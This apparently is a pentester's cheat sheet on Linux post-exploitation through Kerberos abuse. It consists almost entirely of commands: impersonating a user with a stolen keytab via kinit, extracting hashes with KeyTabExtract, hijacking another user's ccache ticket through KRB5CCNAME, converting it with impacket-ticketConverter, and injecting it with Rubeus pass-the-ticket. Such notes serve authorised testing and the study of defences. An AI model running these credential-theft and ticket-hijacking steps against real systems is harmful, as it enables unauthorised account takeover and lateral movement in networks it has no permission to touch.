# Linux Post-Exploitation

## Abusing Keytab

### Impersonate user

```bash
klist -k -t #list keytab file info
kinit carni7@AMOGUS.KEK -k -t /opt/kerbusers/carni7.keytab #impersonation carni7 using his keytab
```

### **KeyTabExtract**

[**\[LINK\]**](https://github.com/sosdave/KeyTabExtract) This is tool which is extracting **Kerberos** hashes from **keytab** file.

```python
python3 /opt/keytabextract.py /opt/specialfiles/carni7.keytab 
```

## Abusing ccache

For using **ccache** files you need to have root privileges

### Checking group privileges

```bash
id venator177@amogus.kek
```

Now after locating right non-expired **Kerberos** ticket, we could import **ccache** file into our session by changing value of <mark style="color:green;">**`KRB5CCNAME`**</mark> env and checking tickets with <mark style="color:red;">**klist.**</mark>

```bash
cp /tmp/krb5cc_768304578_BRB541 .
export KRB5CCNAME=/root/krb5cc_768304578_BRB541
klist
Ticket cache: FILE:/root/krb5cc_768304578_BRB541
```

If the result is the same, we could be sure that now **Kerberos** is using our ticket.

## Ticket Converter

```bash
impacket-ticketConverter krb5cc_768304578_BRB541 carni7.kirbi
```

#### Importing Kerberos Ticket

```powershell
C:\Rubeus.exe ptt /ticket:c:\carni7.kirbi
```